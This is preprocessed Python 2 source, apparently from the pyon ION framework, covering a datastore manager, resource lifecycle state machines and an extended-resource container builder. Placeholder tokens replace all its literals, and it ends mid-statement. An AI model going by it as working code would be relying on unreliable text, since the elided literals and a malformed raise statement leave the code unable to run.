            # from the original (NOTE(review): could be narrowed to OSError).
            os.unlink(reportfile)
        except:
            pass
        print "<STR_LIT>" + reportfile + "<STR_LIT:'>"
        # NOTE(review): report is written only under opts.dryrun in the
        # original token stream — looks inverted, confirm intent.
        if self.opts.dryrun:
            with open(reportfile, '<STR_LIT:w>') as f:
                f.write(validation_results)

    def load_mods(self, path, interfaces):
        # Recursively import every module under `path`, printing (and for
        # non-interface trees, explaining) any import failure; exits the
        # process when any module failed to load.
        mod_prefix = string.replace(path, "<STR_LIT:/>", "<STR_LIT:.>")
        encountered_load_error = False
        for mod_imp, mod_name, is_pkg in pkgutil.iter_modules([path]):
            if is_pkg:
                self.load_mods(path + "<STR_LIT:/>" + mod_name, interfaces)
            else:
                mod_qual = "<STR_LIT>" % (mod_prefix, mod_name)
                try:
                    __import__(mod_qual)
                except Exception, ex:
                    encountered_load_error = True
                    print "<STR_LIT>" % (mod_qual, ex)
                    traceback.print_exc()
                    if not interfaces:
                        print "<STR_LIT>"
                        print "<STR_LIT>"
                        print "<STR_LIT>"
        if encountered_load_error:
            sys.exit(<NUM_LIT:1>)
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from pyon . core . bootstrap import get_sys_name , CFG <EOL> from pyon . datastore . datastore_common import DatastoreFactory , DataStore <EOL> from pyon . util . log import log <EOL> from pyon . util . arg_check import validate_true <EOL> class DatastoreManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , container = None ) : <EOL> self . _datastores = { } <EOL> self . container = container <EOL> def start ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> log . debug ( "<STR_LIT>" , len ( self . _datastores ) ) <EOL> some_datastore = None <EOL> for ds in self . _datastores . itervalues ( ) : <EOL> if not some_datastore and hasattr ( ds , "<STR_LIT>" ) : <EOL> some_datastore = ds <EOL> try : <EOL> ds . close ( ) <EOL> except Exception as ex : <EOL> log . exception ( "<STR_LIT>" ) <EOL> self . _datastores = { } <EOL> if some_datastore : <EOL> try : <EOL> some_datastore . close_all ( ) <EOL> except Exception as ex : <EOL> log . exception ( "<STR_LIT>" ) <EOL> @ classmethod <EOL> def get_scoped_name ( cls , ds_name ) : <EOL> return ( "<STR_LIT>" % ( get_sys_name ( ) , ds_name ) ) . lower ( ) <EOL> def get_datastore ( self , ds_name , profile = None , config = None ) : <EOL> """<STR_LIT>""" <EOL> validate_true ( ds_name , '<STR_LIT>' ) <EOL> if ( ds_name , profile ) in self . _datastores : <EOL> log . debug ( "<STR_LIT>" % ( ds_name , profile ) ) <EOL> return self . _datastores [ ( ds_name , profile ) ] <EOL> log . info ( "<STR_LIT>" % ( ds_name , ds_name , profile ) ) <EOL> new_ds = DatastoreManager . get_datastore_instance ( ds_name , profile ) <EOL> if not new_ds . datastore_exists ( ds_name ) : <EOL> new_ds . create_datastore ( ds_name , create_indexes = True , profile = profile ) <EOL> else : <EOL> new_ds . define_profile_views ( profile = profile , keepviews = True ) <EOL> new_ds . local_name = ds_name <EOL> new_ds . ds_profile = profile <EOL> self . 
_datastores [ ( ds_name , profile ) ] = new_ds <EOL> return new_ds <EOL> @ classmethod <EOL> def get_datastore_instance ( cls , ds_name , profile = None ) : <EOL> profile = profile or DataStore . DS_PROFILE_MAPPING . get ( ds_name , DataStore . DS_PROFILE . BASIC ) <EOL> new_ds = DatastoreFactory . get_datastore ( datastore_name = ds_name , profile = profile , scope = get_sys_name ( ) , <EOL> config = CFG , variant = DatastoreFactory . DS_FULL ) <EOL> return new_ds <EOL> @ classmethod <EOL> def exists ( cls , ds_name , scoped = True , config = None ) : <EOL> if scoped : <EOL> ds_name = DatastoreManager . get_scoped_name ( ds_name ) <EOL> generic_ds = cls . get_datastore_instance ( "<STR_LIT>" ) <EOL> return generic_ds . datastore_exists ( ds_name ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import inspect <EOL> import types <EOL> import time <EOL> from pyon . core . registry import getextends , issubtype , is_ion_object , isenum <EOL> from pyon . core . bootstrap import IonObject <EOL> from pyon . core . exception import BadRequest , NotFound , Inconsistent , Unauthorized <EOL> from pyon . util . config import Config <EOL> from pyon . util . containers import DotDict , named_any , get_ion_ts <EOL> from pyon . util . execute import get_method_arguments , get_remote_info , execute_method <EOL> from pyon . util . log import log <EOL> ObjectTypes = DotDict ( ) <EOL> OT = ObjectTypes <EOL> ResourceTypes = DotDict ( ) <EOL> RT = ResourceTypes <EOL> Predicates = DotDict ( ) <EOL> PredicateType = DotDict ( ) <EOL> PRED = PredicateType <EOL> CompoundAssociations = DotDict ( ) <EOL> LifeCycleStates = DotDict ( ) <EOL> LCS = LifeCycleStates <EOL> LCS_NONE = "<STR_LIT>" <EOL> AvailabilityStates = DotDict ( ) <EOL> AS = AvailabilityStates <EOL> LCE = DotDict ( ) <EOL> lcs_workflow_defs = { } <EOL> lcs_workflows = { } <EOL> def get_predicate_type_list ( ) : <EOL> """<STR_LIT>""" <EOL> Predicates . clear ( ) <EOL> assoc_defs = Config ( [ "<STR_LIT>" ] ) . data [ '<STR_LIT>' ] <EOL> for ad in assoc_defs : <EOL> if ad [ '<STR_LIT>' ] in Predicates : <EOL> raise Inconsistent ( '<STR_LIT>' % ad [ '<STR_LIT>' ] ) <EOL> Predicates [ ad [ '<STR_LIT>' ] ] = ad <EOL> return Predicates . keys ( ) <EOL> def get_compound_associations_list ( ) : <EOL> """<STR_LIT>""" <EOL> CompoundAssociations . clear ( ) <EOL> CompoundAssociations . update ( Config ( [ "<STR_LIT>" ] ) . data [ '<STR_LIT>' ] ) <EOL> return CompoundAssociations . keys ( ) <EOL> def initialize_res_lcsms ( ) : <EOL> """<STR_LIT>""" <EOL> res_lifecycle = ( Config ( [ "<STR_LIT>" ] ) ) . data <EOL> lcs_workflow_defs . clear ( ) <EOL> lcsm_defs = res_lifecycle [ "<STR_LIT>" ] <EOL> for wf in lcsm_defs : <EOL> wfname = wf [ '<STR_LIT:name>' ] <EOL> clsname = wf . 
get ( '<STR_LIT>' , None ) <EOL> if clsname : <EOL> wf_cls = named_any ( clsname ) <EOL> lcs_workflow_defs [ wfname ] = wf_cls ( ** wf ) <EOL> else : <EOL> based_on = wf . get ( '<STR_LIT>' , None ) <EOL> wf_base = lcs_workflow_defs [ based_on ] <EOL> lcs_workflow_defs [ wfname ] = wf_base . _clone_with_restrictions ( wf ) <EOL> lcs_workflows . clear ( ) <EOL> for res_type , wf_name in res_lifecycle [ "<STR_LIT>" ] . iteritems ( ) : <EOL> lcs_workflows [ res_type ] = lcs_workflow_defs [ wf_name ] <EOL> def load_definitions ( ) : <EOL> """<STR_LIT>""" <EOL> ot_list = getextends ( '<STR_LIT>' ) <EOL> ot_list . append ( '<STR_LIT>' ) <EOL> ObjectTypes . clear ( ) <EOL> ObjectTypes . update ( zip ( ot_list , ot_list ) ) <EOL> ObjectTypes . lock ( ) <EOL> rt_list = getextends ( '<STR_LIT>' ) <EOL> rt_list . append ( '<STR_LIT>' ) <EOL> ResourceTypes . clear ( ) <EOL> ResourceTypes . update ( zip ( rt_list , rt_list ) ) <EOL> ResourceTypes . lock ( ) <EOL> pt_list = get_predicate_type_list ( ) <EOL> PredicateType . clear ( ) <EOL> PredicateType . update ( zip ( pt_list , pt_list ) ) <EOL> PredicateType . lock ( ) <EOL> get_compound_associations_list ( ) <EOL> initialize_res_lcsms ( ) <EOL> lcstates , avstates , fsmevents = get_all_lcsm_names ( ) <EOL> LifeCycleStates . clear ( ) <EOL> LifeCycleStates . update ( zip ( lcstates , lcstates ) ) <EOL> LifeCycleStates . lock ( ) <EOL> AvailabilityStates . clear ( ) <EOL> AvailabilityStates . update ( zip ( avstates , avstates ) ) <EOL> AvailabilityStates . lock ( ) <EOL> LCE . clear ( ) <EOL> LCE . update ( zip ( [ e . upper ( ) for e in fsmevents ] , fsmevents ) ) <EOL> LCE . lock ( ) <EOL> def is_resource ( object ) : <EOL> """<STR_LIT>""" <EOL> return issubtype ( object . 
type_ , "<STR_LIT>" ) <EOL> def create_access_args ( current_actor_id = None , superuser_actor_ids = None ) : <EOL> """<STR_LIT>""" <EOL> access_args = dict ( current_actor_id = current_actor_id , <EOL> superuser_actor_ids = superuser_actor_ids ) <EOL> return access_args <EOL> def get_object_schema ( resource_type ) : <EOL> """<STR_LIT>""" <EOL> schema_info = dict ( ) <EOL> schema_info [ '<STR_LIT>' ] = dict ( ) <EOL> ion_object_name = str ( resource_type ) <EOL> ret_obj = IonObject ( ion_object_name , { } ) <EOL> if hasattr ( ret_obj , "<STR_LIT>" ) : <EOL> schema = ret_obj . _schema <EOL> for field in ret_obj . _schema : <EOL> if schema [ field ] [ "<STR_LIT:default>" ] is None : <EOL> try : <EOL> value = IonObject ( schema [ field ] [ "<STR_LIT:type>" ] , { } ) <EOL> except NotFound : <EOL> value = None <EOL> setattr ( ret_obj , field , value ) <EOL> if hasattr ( ret_obj , '<STR_LIT>' ) : <EOL> schema_info [ '<STR_LIT>' ] [ ion_object_name ] = ret_obj . _schema <EOL> for field in ret_obj . _schema : <EOL> obj_type = ret_obj . _schema [ field ] [ '<STR_LIT:type>' ] <EOL> if is_ion_object ( obj_type ) : <EOL> try : <EOL> value = IonObject ( obj_type , { } ) <EOL> schema_info [ '<STR_LIT>' ] [ obj_type ] = value . _schema <EOL> except NotFound : <EOL> pass <EOL> elif ret_obj . _schema [ field ] . has_key ( '<STR_LIT>' ) : <EOL> if isenum ( ret_obj . _schema [ field ] [ '<STR_LIT>' ] ) : <EOL> value = IonObject ( ret_obj . _schema [ field ] [ '<STR_LIT>' ] , { } ) <EOL> schema_info [ '<STR_LIT>' ] [ ret_obj . _schema [ field ] [ '<STR_LIT>' ] ] = value . _str_map <EOL> schema_info [ '<STR_LIT:object>' ] = ret_obj <EOL> elif isenum ( resource_type ) : <EOL> schema_info [ '<STR_LIT>' ] [ resource_type ] = { } <EOL> schema_info [ '<STR_LIT>' ] [ resource_type ] = ret_obj . _str_map <EOL> else : <EOL> raise ( '<STR_LIT>' , resource_type ) <EOL> return schema_info <EOL> def get_restype_lcsm ( restype ) : <EOL> return lcs_workflows . 
get ( restype , None ) <EOL> def get_default_lcsm ( ) : <EOL> pass <EOL> def lcstate ( maturity , availability ) : <EOL> """<STR_LIT>""" <EOL> if not maturity and maturity not in LCS : <EOL> return BadRequest ( "<STR_LIT>" % maturity ) <EOL> if not availability and availability not in AS : <EOL> return BadRequest ( "<STR_LIT>" % availability ) <EOL> return "<STR_LIT>" % ( maturity , availability ) <EOL> def lcsplit ( lcstate ) : <EOL> """<STR_LIT>""" <EOL> return lcstate . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) <EOL> def get_all_lcsm_names ( ) : <EOL> """<STR_LIT>""" <EOL> lcstates = sorted ( { lcs for lcsm in lcs_workflow_defs . values ( ) for lcs in lcsm . lcstate_states } ) <EOL> avstates = sorted ( { avs for lcsm in lcs_workflow_defs . values ( ) for avs in lcsm . availability_states } ) <EOL> fsmevents = set ( ) <EOL> for lcsm in lcs_workflow_defs . values ( ) : <EOL> for src , evt in lcsm . lcstate_transitions . keys ( ) : <EOL> fsmevents . add ( evt ) <EOL> for src , evt in lcsm . availability_transitions . keys ( ) : <EOL> fsmevents . add ( evt ) <EOL> fsmevents = sorted ( fsmevents ) <EOL> return lcstates , avstates , fsmevents <EOL> class ResourceLifeCycleSM ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _kwargs = kwargs <EOL> self . _initialize_fsms ( ) <EOL> def _initialize_fsms ( self ) : <EOL> lc_states = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> lc_trans = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> self . lcstate_states , self . lcstate_transitions = self . _get_fsm_definition ( lc_states , lc_trans ) <EOL> self . initial_state = self . _kwargs . get ( '<STR_LIT>' , None ) <EOL> av_states = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> av_trans = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> self . availability_states , self . availability_transitions = self . _get_fsm_definition ( av_states , av_trans ) <EOL> self . initial_availability = self . _kwargs . 
get ( '<STR_LIT>' , None ) <EOL> self . state_aliases = { } <EOL> def _get_fsm_definition ( self , state_def , trans_def ) : <EOL> fsm_states = set ( ) <EOL> fsm_states . update ( state_def ) <EOL> fsm_transitions = { ( src , evt ) : targ for src , evt , targ in trans_def } <EOL> return fsm_states , fsm_transitions <EOL> def is_in_state ( self , current_state , query_state ) : <EOL> return ( current_state == query_state ) or ( current_state in self . state_aliases [ query_state ] ) <EOL> def _clone_with_restrictions ( self , wfargs = None ) : <EOL> wfargs = wfargs if not None else { } <EOL> clone = self . __class__ ( ** wfargs ) <EOL> clone . lcstate_states = self . lcstate_states . copy ( ) <EOL> clone . lcstate_transitions = self . lcstate_transitions . copy ( ) <EOL> clone . availability_states = self . availability_states . copy ( ) <EOL> clone . availability_transitions = self . availability_transitions . copy ( ) <EOL> clone . _apply_restrictions ( ** wfargs ) <EOL> return clone <EOL> def _apply_restrictions ( self , ** kwargs ) : <EOL> self . remove_states = kwargs . get ( '<STR_LIT>' , None ) <EOL> if self . remove_states : <EOL> trans_new = self . lcstate_transitions . copy ( ) <EOL> for ( src , evt ) , targ in self . lcstate_transitions . iteritems ( ) : <EOL> if src in self . remove_states or targ in self . remove_states : <EOL> del trans_new [ ( src , evt ) ] <EOL> self . lcstate_transitions = trans_new <EOL> self . lcstate_states = self . lcstate_states - set ( self . remove_states ) <EOL> def get_lcstate_successor ( self , current_state , transition_event ) : <EOL> """<STR_LIT>""" <EOL> return self . lcstate_transitions . get ( ( current_state , transition_event ) , None ) <EOL> def get_availability_successor ( self , current_state , transition_event ) : <EOL> """<STR_LIT>""" <EOL> return self . availability_transitions . 
get ( ( current_state , transition_event ) , None ) <EOL> def get_lcstate_successors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { evt : targ for ( src , evt ) , targ in self . lcstate_transitions . iteritems ( ) if src == some_state } <EOL> def get_availability_successors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { evt : targ for ( src , evt ) , targ in self . availability_transitions . iteritems ( ) if src == some_state } <EOL> def get_lcstate_predecessors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { src : evt for ( src , evt ) , targ in self . lcstate_transitions . iteritems ( ) if targ == some_state } <EOL> def get_availability_predecessors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { src : evt for ( src , evt ) , targ in self . availability_transitions . iteritems ( ) if targ == some_state } <EOL> class ExtendedResourceContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , serv_prov , res_registry = None ) : <EOL> self . service_provider = serv_prov <EOL> if res_registry is not None : <EOL> self . _rr = res_registry <EOL> else : <EOL> if hasattr ( serv_prov . container , '<STR_LIT>' ) and serv_prov . container . has_capability ( '<STR_LIT>' ) : <EOL> self . _rr = serv_prov . container . resource_registry <EOL> else : <EOL> self . _rr = self . service_provider . clients . resource_registry <EOL> self . 
ctx = None <EOL> def create_extended_resource_container_list ( self , extended_resource_type , resource_id_list , <EOL> computed_resource_type = None , <EOL> ext_associations = None , ext_exclude = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( resource_id_list , types . ListType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> ret = list ( ) <EOL> for res_id in resource_id_list : <EOL> ext_res = self . create_extended_resource_container ( extended_resource_type , res_id , computed_resource_type , <EOL> ext_associations , ext_exclude ) <EOL> ret . append ( ext_res ) <EOL> return ret <EOL> def create_extended_resource_container ( self , extended_resource_type , resource_id , computed_resource_type = None , <EOL> ext_associations = None , ext_exclude = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> overall_start_time = time . time ( ) <EOL> self . ctx = None <EOL> if not isinstance ( resource_id , types . StringType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not self . service_provider or not self . _rr : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if extended_resource_type not in getextends ( OT . ResourceContainer ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( extended_resource_type , OT . ResourceContainer ) ) <EOL> if computed_resource_type and computed_resource_type not in getextends ( OT . BaseComputedAttributes ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( computed_resource_type , OT . BaseComputedAttributes ) ) <EOL> resource_object = self . _rr . read ( resource_id ) <EOL> if not resource_object : <EOL> raise NotFound ( "<STR_LIT>" % resource_id ) <EOL> res_container = IonObject ( extended_resource_type ) <EOL> originResourceType = res_container . get_class_decorator_value ( '<STR_LIT>' ) <EOL> if originResourceType is None : <EOL> log . error ( '<STR_LIT>' , extended_resource_type ) <EOL> elif originResourceType != resource_object . type_ and not issubtype ( resource_object . 
type_ , originResourceType ) : <EOL> raise Inconsistent ( '<STR_LIT>' % ( <EOL> extended_resource_type , originResourceType , resource_object . type_ ) ) <EOL> res_container . _id = resource_object . _id <EOL> res_container . resource = resource_object <EOL> self . _prepare_context ( resource_object . _id ) <EOL> self . set_container_lcstate_info ( res_container ) <EOL> self . set_res_container_info ( res_container ) <EOL> self . set_container_field_values ( res_container , ext_exclude , ** kwargs ) <EOL> self . set_computed_attributes ( res_container , computed_resource_type , ext_exclude , ** kwargs ) <EOL> self . set_extended_associations ( res_container , ext_associations , ext_exclude ) <EOL> res_container . ts_created = get_ion_ts ( ) <EOL> overall_stop_time = time . time ( ) <EOL> log . debug ( "<STR_LIT>" , extended_resource_type , overall_stop_time - overall_start_time ) <EOL> return res_container <EOL> def set_res_container_info ( self , res_container ) : <EOL> """<STR_LIT>""" <EOL> res_container . type_version = res_container . resource . get_class_decorator_value ( '<STR_LIT>' ) <EOL> def set_container_lcstate_info ( self , res_container ) : <EOL> """<STR_LIT>""" <EOL> restype_workflow = get_restype_lcsm ( res_container . resource . type_ ) <EOL> if restype_workflow : <EOL> res_container . lcstate_transitions = restype_workflow . get_lcstate_successors ( res_container . resource . lcstate ) <EOL> res_container . availability_transitions = restype_workflow . get_availability_successors ( res_container . resource . availability ) <EOL> else : <EOL> res_container . lcstate_transitions = { LCE . RETIRE : LCS . RETIRED , LCE . DELETE : LCS . DELETED } <EOL> res_container . availability_transitions = { } <EOL> def set_container_field_values ( self , res_container , ext_exclude , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . set_object_field_values ( res_container , res_container . 
resource , ext_exclude , ** kwargs ) <EOL> def set_computed_attributes ( self , res_container , computed_resource_type , ext_exclude , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not computed_resource_type or computed_resource_type is None : <EOL> return <EOL> res_container . computed = IonObject ( computed_resource_type ) <EOL> self . set_object_field_values ( res_container . computed , res_container . resource , ext_exclude , ** kwargs ) <EOL> def set_object_field_values ( self , obj , resource , ext_exclude , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> field_needs = [ ] <EOL> resource_needs = set ( ) <EOL> assoc_needs = set ( ) <EOL> final_target_types = { } <EOL> for field in obj . _schema : <EOL> if ext_exclude is not None and field in ext_exclude : <EOL> continue <EOL> for decorator in obj . _schema [ field ] [ '<STR_LIT>' ] : <EOL> field_start_time = time . time ( ) <EOL> if decorator == '<STR_LIT>' : <EOL> deco_value = obj . get_decorator_value ( field , decorator ) <EOL> method_name = deco_value if deco_value else '<STR_LIT>' + field <EOL> ret_val = self . execute_method_with_resource ( resource . _id , method_name , ** kwargs ) <EOL> if ret_val is not None : <EOL> setattr ( obj , field , ret_val ) <EOL> elif decorator == '<STR_LIT>' : <EOL> deco_value = obj . get_decorator_value ( field , decorator ) <EOL> if obj . _schema [ field ] [ '<STR_LIT:type>' ] != '<STR_LIT>' : <EOL> log . error ( '<STR_LIT>' , field ) <EOL> continue <EOL> method_name = deco_value if deco_value else '<STR_LIT>' + field <EOL> if method_name . find ( '<STR_LIT:.>' ) == - <NUM_LIT:1> : <EOL> raise Inconsistent ( '<STR_LIT>' , field ) <EOL> service_client , operation = get_remote_info ( self , method_name ) <EOL> rmi_call = method_name . split ( '<STR_LIT:.>' ) <EOL> parms = { '<STR_LIT>' : resource . _id } <EOL> parms . update ( get_method_arguments ( service_client , operation , ** kwargs ) ) <EOL> ret_val = IonObject ( OT . 
ServiceRequest , service_name = rmi_call [ <NUM_LIT:0> ] , service_operation = operation , request_parameters = parms ) <EOL> setattr ( obj , field , ret_val ) <EOL> elif self . is_compound_association ( decorator ) : <EOL> target_type = obj . get_decorator_value ( field , decorator ) <EOL> if target_type and '<STR_LIT:U+002C>' in target_type : <EOL> target_type , final_target_type = target_type . split ( '<STR_LIT:U+002C>' ) <EOL> final_target_types [ field ] = final_target_type <EOL> predicates = self . get_compound_association_predicates ( decorator ) <EOL> assoc_list = self . _find_associated_resources ( resource , predicates [ <NUM_LIT:0> ] , target_type ) <EOL> field_needs . append ( ( field , "<STR_LIT:A>" , ( assoc_list , predicates ) ) ) <EOL> for target_id , assoc in assoc_list : <EOL> assoc_needs . add ( ( target_id , predicates [ <NUM_LIT:1> ] ) ) <EOL> elif self . is_association_predicate ( decorator ) : <EOL> target_type = obj . get_decorator_value ( field , decorator ) <EOL> if target_type and '<STR_LIT:U+002C>' in target_type : <EOL> target_type = target_type . split ( '<STR_LIT:U+002C>' ) <EOL> assoc_list = self . _find_associated_resources ( resource , decorator , target_type ) <EOL> if obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:list>' : <EOL> if assoc_list : <EOL> field_needs . append ( ( field , "<STR_LIT:L>" , assoc_list ) ) <EOL> [ resource_needs . add ( target_id ) for target_id , assoc in assoc_list ] <EOL> elif obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:int>' : <EOL> setattr ( obj , field , len ( assoc_list ) ) <EOL> else : <EOL> if assoc_list : <EOL> first_assoc = assoc_list [ <NUM_LIT:0> ] <EOL> if len ( assoc_list ) != <NUM_LIT:1> : <EOL> log . warn ( "<STR_LIT>" , field , len ( assoc_list ) ) <EOL> field_needs . append ( ( field , "<STR_LIT:O>" , first_assoc ) ) <EOL> resource_needs . add ( first_assoc [ <NUM_LIT:0> ] ) <EOL> else : <EOL> setattr ( obj , field , None ) <EOL> else : <EOL> log . 
debug ( "<STR_LIT>" , decorator , field , resource . _id ) <EOL> field_stop_time = time . time ( ) <EOL> if not field_needs : <EOL> return <EOL> if assoc_needs : <EOL> assocs = self . _rr . find_associations ( anyside = list ( assoc_needs ) , id_only = False ) <EOL> self . _add_associations ( assocs ) <EOL> for field , need_type , needs in field_needs : <EOL> if need_type == '<STR_LIT:A>' : <EOL> assoc_list , predicates = needs <EOL> for target_id , assoc in assoc_list : <EOL> res_type = assoc . ot if target_id == assoc . o else assoc . st <EOL> assoc_list1 = self . _find_associated_resources ( target_id , predicates [ <NUM_LIT:1> ] , None , res_type ) <EOL> for target_id1 , assoc1 in assoc_list1 : <EOL> resource_needs . add ( target_id1 ) <EOL> res_list = self . _rr . read_mult ( list ( resource_needs ) ) <EOL> res_objs = dict ( zip ( resource_needs , res_list ) ) <EOL> for field , need_type , needs in field_needs : <EOL> if need_type == '<STR_LIT:L>' : <EOL> obj_list = [ res_objs [ target_id ] for target_id , assoc in needs ] <EOL> setattr ( obj , field , obj_list ) <EOL> elif need_type == '<STR_LIT:O>' : <EOL> target_id , assoc = needs <EOL> setattr ( obj , field , res_objs [ target_id ] ) <EOL> elif need_type == '<STR_LIT:A>' : <EOL> assoc_list , predicates = needs <EOL> obj_list = [ ] <EOL> for target_id , assoc in assoc_list : <EOL> res_type = assoc . ot if target_id == assoc . o else assoc . st <EOL> assoc_list1 = self . _find_associated_resources ( target_id , predicates [ <NUM_LIT:1> ] , None , res_type ) <EOL> obj_list . append ( [ res_objs [ target_id1 ] for target_id1 , assoc1 in assoc_list1 ] ) <EOL> result_obj_list = [ ] <EOL> for ol_nested in obj_list : <EOL> if ol_nested : <EOL> if final_target_types . has_key ( field ) : <EOL> result_obj_list . extend ( [ target_obj for target_obj in ol_nested if ( target_obj . type_ != resource . type_ and final_target_types [ field ] in target_obj . _get_extends ( ) ) ] ) <EOL> else : <EOL> result_obj_list . 
extend ( [ target_obj for target_obj in ol_nested if ( target_obj . type_ != resource . type_ ) ] ) <EOL> if obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:list>' : <EOL> if result_obj_list : <EOL> setattr ( obj , field , result_obj_list ) <EOL> elif obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:int>' : <EOL> setattr ( obj , field , len ( result_obj_list ) ) <EOL> else : <EOL> if result_obj_list : <EOL> if len ( result_obj_list ) != <NUM_LIT:1> : <EOL> log . warn ( "<STR_LIT>" , field , len ( result_obj_list ) ) <EOL> setattr ( obj , field , result_obj_list [ <NUM_LIT:0> ] ) <EOL> else : <EOL> setattr ( obj , field , None ) <EOL> def set_extended_associations ( self , res_container , ext_associations , ext_exclude ) : <EOL> """<STR_LIT>""" <EOL> if ext_associations is not None : <EOL> for ext_field in ext_associations : <EOL> if ext_exclude is not None and ext_field in ext_exclude : <EOL> continue <EOL> objs = self . _find_associated_resources ( res_container . resource , ext_associations [ ext_field ] ) <EOL> if objs : <EOL> res_container . ext_associations [ ext_field ] = objs <EOL> else : <EOL> res_container . ext_associations [ ext_field ] = list ( ) <EOL> def _prepare_context ( self , resource_id ) : <EOL> """<STR_LIT>""" <EOL> self . ctx = dict ( by_subject = { } , by_object = { } ) <EOL> assocs = self . _rr . find_associations ( anyside = resource_id , id_only = False ) <EOL> self . _add_associations ( assocs ) <EOL> log . debug ( "<STR_LIT>" , len ( assocs ) , resource_id ) <EOL> def _add_associations ( self , assocs ) : <EOL> """<STR_LIT>""" <EOL> by_subject = self . ctx [ '<STR_LIT>' ] <EOL> by_object = self . ctx [ '<STR_LIT>' ] <EOL> for assoc in assocs : <EOL> sub_key = ( assoc . s , assoc . p ) <EOL> if sub_key not in by_subject : <EOL> by_subject [ sub_key ] = [ ] <EOL> by_subject [ sub_key ] . append ( assoc ) <EOL> obj_key = ( assoc . o , assoc . 
p ) <EOL> if obj_key not in by_object : <EOL> by_object [ obj_key ] = [ ] <EOL> by_object [ obj_key ] . append ( assoc ) <EOL> def is_predicate_association ( self , predicate , predicate_type , res ) : <EOL> for predt in predicate [ predicate_type ] : <EOL> if res == predt : <EOL> return True <EOL> return False <EOL> def is_predicate_association_extension ( self , predicate , predicate_type , res ) : <EOL> for predt in predicate [ predicate_type ] : <EOL> if res in getextends ( predt ) : <EOL> return True <EOL> return False <EOL> def is_association_predicate ( self , association ) : <EOL> if association and ( association . endswith ( "<STR_LIT:>>" ) or association . endswith ( "<STR_LIT:<>" ) ) : <EOL> association = association [ : - <NUM_LIT:1> ] <EOL> return Predicates . has_key ( association ) <EOL> def is_compound_association ( self , association ) : <EOL> return CompoundAssociations . has_key ( association ) <EOL> def get_compound_association_predicates ( self , association ) : <EOL> if CompoundAssociations . has_key ( association ) : <EOL> return CompoundAssociations [ association ] [ '<STR_LIT>' ] <EOL> return list ( ) <EOL> def _allow_direction ( self , assoc_direction , direction ) : <EOL> if not assoc_direction : <EOL> return True <EOL> return assoc_direction == direction <EOL> def _find_associated_resources ( self , resource , association_predicate , target_type = None , res_type = None ) : <EOL> """<STR_LIT>""" <EOL> assoc_list = [ ] <EOL> res_type = res_type or resource . type_ <EOL> resource_id = resource if type ( resource ) is str else resource . _id <EOL> if target_type and type ( target_type ) not in ( list , tuple ) : <EOL> target_type = [ target_type ] <EOL> assoc_direction = "<STR_LIT>" <EOL> if association_predicate and ( association_predicate . endswith ( "<STR_LIT:>>" ) or association_predicate . 
endswith ( "<STR_LIT:<>" ) ) : <EOL> assoc_direction = association_predicate [ - <NUM_LIT:1> ] <EOL> association_predicate = association_predicate [ : - <NUM_LIT:1> ] <EOL> pred = Predicates [ association_predicate ] <EOL> if not pred : <EOL> return [ ] <EOL> if self . is_predicate_association ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:>>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = False ) ) <EOL> if not assoc_list and not assoc_direction : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> elif self . is_predicate_association ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:<>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> elif self . is_predicate_association_extension ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:>>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = False ) ) <EOL> if not assoc_list and not assoc_direction : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> elif self . is_predicate_association_extension ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:<>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> else : <EOL> log . 
